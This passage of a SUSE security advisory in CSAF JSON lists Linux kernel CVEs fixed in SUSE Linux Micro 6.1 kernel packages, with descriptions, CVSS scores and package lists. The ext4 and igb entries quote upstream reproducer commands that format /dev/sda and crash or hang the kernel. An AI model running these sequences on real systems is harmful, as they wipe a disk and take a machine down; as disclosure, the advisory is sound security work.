"summary": "SUSE Bug 1256369 for CVE-2023-54067",
"url": "https://bugzilla.suse.com/1256369"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54067"
},
{
"cve": "CVE-2023-54069",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54069"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix BUG in ext4_mb_new_inode_pa() due to overflow\n\nWhen we calculate the end position of ext4_free_extent, this position may\nbe exactly where ext4_lblk_t (i.e. uint) overflows. For example, if\nac_g_ex.fe_logical is 4294965248 and ac_orig_goal_len is 2048, then the\ncomputed end is 0x100000000, which is 0. If ac-\u003eac_o_ex.fe_logical is not\nthe first case of adjusting the best extent, that is, new_bex_end \u003e 0, the\nfollowing BUG_ON will be triggered:\n\n=========================================================\nkernel BUG at fs/ext4/mballoc.c:5116!\ninvalid opcode: 0000 [#1] PREEMPT SMP PTI\nCPU: 3 PID: 673 Comm: xfs_io Tainted: G E 6.5.0-rc1+ #279\nRIP: 0010:ext4_mb_new_inode_pa+0xc5/0x430\nCall Trace:\n \u003cTASK\u003e\n ext4_mb_use_best_found+0x203/0x2f0\n ext4_mb_try_best_found+0x163/0x240\n ext4_mb_regular_allocator+0x158/0x1550\n ext4_mb_new_blocks+0x86a/0xe10\n ext4_ext_map_blocks+0xb0c/0x13a0\n ext4_map_blocks+0x2cd/0x8f0\n ext4_iomap_begin+0x27b/0x400\n iomap_iter+0x222/0x3d0\n __iomap_dio_rw+0x243/0xcb0\n iomap_dio_rw+0x16/0x80\n=========================================================\n\nA simple reproducer demonstrating the problem:\n\n\tmkfs.ext4 -F /dev/sda -b 4096 100M\n\tmount /dev/sda /tmp/test\n\tfallocate -l1M /tmp/test/tmp\n\tfallocate -l10M /tmp/test/file\n\tfallocate -i -o 1M -l16777203M /tmp/test/file\n\tfsstress -d /tmp/test -l 0 -n 100000 -p 8 \u0026\n\tsleep 10 \u0026\u0026 killall -9 fsstress\n\trm -f /tmp/test/tmp\n\txfs_io -c \"open -ad /tmp/test/file\" -c \"pwrite -S 0xff 0 8192\"\n\nWe simply refactor the logic for adjusting the best extent by adding\na temporary ext4_free_extent ex and use extent_logical_end() to avoid\noverflow, which also simplifies the code.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54069",
"url": "https://www.suse.com/security/cve/CVE-2023-54069"
},
{
"category": "external",
"summary": "SUSE Bug 1256371 for CVE-2023-54069",
"url": "https://bugzilla.suse.com/1256371"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54069"
},
{
"cve": "CVE-2023-54070",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54070"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nigb: clean up in all error paths when enabling SR-IOV\n\nAfter commit 50f303496d92 (\"igb: Enable SR-IOV after reinit\"), removing\nthe igb module could hang or crash (depending on the machine) when the\nmodule has been loaded with the max_vfs parameter set to some value != 0.\n\nIn case of one test machine with a dual port 82580, this hang occurred:\n\n[ 232.480687] igb 0000:41:00.1: removed PHC on enp65s0f1\n[ 233.093257] igb 0000:41:00.1: IOV Disabled\n[ 233.329969] pcieport 0000:40:01.0: AER: Multiple Uncorrected (Non-Fatal) err0\n[ 233.340302] igb 0000:41:00.0: PCIe Bus Error: severity=Uncorrected (Non-Fata)\n[ 233.352248] igb 0000:41:00.0: device [8086:1516] error status/mask=00100000\n[ 233.361088] igb 0000:41:00.0: [20] UnsupReq (First)\n[ 233.368183] igb 0000:41:00.0: AER: TLP Header: 40000001 0000040f cdbfc00c c\n[ 233.376846] igb 0000:41:00.1: PCIe Bus Error: severity=Uncorrected (Non-Fata)\n[ 233.388779] igb 0000:41:00.1: device [8086:1516] error status/mask=00100000\n[ 233.397629] igb 0000:41:00.1: [20] UnsupReq (First)\n[ 233.404736] igb 0000:41:00.1: AER: TLP Header: 40000001 0000040f cdbfc00c c\n[ 233.538214] pci 0000:41:00.1: AER: can\u0027t recover (no error_detected callback)\n[ 233.538401] igb 0000:41:00.0: removed PHC on enp65s0f0\n[ 233.546197] pcieport 0000:40:01.0: AER: device recovery failed\n[ 234.157244] igb 0000:41:00.0: IOV Disabled\n[ 371.619705] INFO: task irq/35-aerdrv:257 blocked for more than 122 seconds.\n[ 371.627489] Not tainted 6.4.0-dirty #2\n[ 371.632257] \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this.\n[ 371.641000] task:irq/35-aerdrv state:D stack:0 pid:257 ppid:2 f0\n[ 371.650330] Call Trace:\n[ 371.653061] \u003cTASK\u003e\n[ 371.655407] __schedule+0x20e/0x660\n[ 371.659313] schedule+0x5a/0xd0\n[ 371.662824] schedule_preempt_disabled+0x11/0x20\n[ 371.667983] __mutex_lock.constprop.0+0x372/0x6c0\n[ 371.673237] ? __pfx_aer_root_reset+0x10/0x10\n[ 371.678105] report_error_detected+0x25/0x1c0\n[ 371.682974] ? __pfx_report_normal_detected+0x10/0x10\n[ 371.688618] pci_walk_bus+0x72/0x90\n[ 371.692519] pcie_do_recovery+0xb2/0x330\n[ 371.696899] aer_process_err_devices+0x117/0x170\n[ 371.702055] aer_isr+0x1c0/0x1e0\n[ 371.705661] ? __set_cpus_allowed_ptr+0x54/0xa0\n[ 371.710723] ? __pfx_irq_thread_fn+0x10/0x10\n[ 371.715496] irq_thread_fn+0x20/0x60\n[ 371.719491] irq_thread+0xe6/0x1b0\n[ 371.723291] ? __pfx_irq_thread_dtor+0x10/0x10\n[ 371.728255] ? __pfx_irq_thread+0x10/0x10\n[ 371.732731] kthread+0xe2/0x110\n[ 371.736243] ? __pfx_kthread+0x10/0x10\n[ 371.740430] ret_from_fork+0x2c/0x50\n[ 371.744428] \u003c/TASK\u003e\n\nThe reproducer was a simple script:\n\n #!/bin/sh\n for i in `seq 1 5`; do\n modprobe -rv igb\n modprobe -v igb max_vfs=1\n sleep 1\n modprobe -rv igb\n done\n\nIt turned out that this could only be reproduce on 82580 (quad and\ndual-port), but not on 82576, i350 and i210. Further debugging showed\nthat igb_enable_sriov()\u0027s call to pci_enable_sriov() is failing, because\ndev-\u003eis_physfn is 0 on 82580.\n\nPrior to commit 50f303496d92 (\"igb: Enable SR-IOV after reinit\"),\nigb_enable_sriov() jumped into the \"err_out\" cleanup branch. After this\ncommit it only returned the error code.\n\nSo the cleanup didn\u0027t take place, and the incorrect VF setup in the\nigb_adapter structure fooled the igb driver into assuming that VFs have\nbeen set up where no VF actually existed.\n\nFix this problem by cleaning up again if pci_enable_sriov() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54070",
"url": "https://www.suse.com/security/cve/CVE-2023-54070"
},
{
"category": "external",
"summary": "SUSE Bug 1256364 for CVE-2023-54070",
"url": "https://bugzilla.suse.com/1256364"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54070"
},
{
"cve": "CVE-2023-54072",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54072"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: pcm: Fix potential data race at PCM memory allocation helpers\n\nThe PCM memory allocation helpers have a sanity check against too many\nbuffer allocations. However, the check is performed without a proper\nlock and the allocation isn\u0027t serialized; this allows user to allocate\nmore memories than predefined max size.\n\nPractically seen, this isn\u0027t really a big problem, as it\u0027s more or\nless some \"soft limit\" as a sanity check, and it\u0027s not possible to\nallocate unlimitedly. But it\u0027s still better to address this for more\nconsistent behavior.\n\nThe patch covers the size check in do_alloc_pages() with the\ncard-\u003ememory_mutex, and increases the allocated size there for\npreventing the further overflow. When the actual allocation fails,\nthe size is decreased accordingly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54072",
"url": "https://www.suse.com/security/cve/CVE-2023-54072"
},
{
"category": "external",
"summary": "SUSE Bug 1256291 for CVE-2023-54072",
"url": "https://bugzilla.suse.com/1256291"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54072"
},
{
"cve": "CVE-2023-54076",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54076"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix missed ses refcounting\n\nUse new cifs_smb_ses_inc_refcount() helper to get an active reference\nof @ses and @ses-\u003edfs_root_ses (if set). This will prevent\n@ses-\u003edfs_root_ses of being put in the next call to cifs_put_smb_ses()\nand thus potentially causing an use-after-free bug.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54076",
"url": "https://www.suse.com/security/cve/CVE-2023-54076"
},
{
"category": "external",
"summary": "SUSE Bug 1256335 for CVE-2023-54076",
"url": "https://bugzilla.suse.com/1256335"
},
{
"category": "external",
"summary": "SUSE Bug 1256450 for CVE-2023-54076",
"url": "https://bugzilla.suse.com/1256450"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
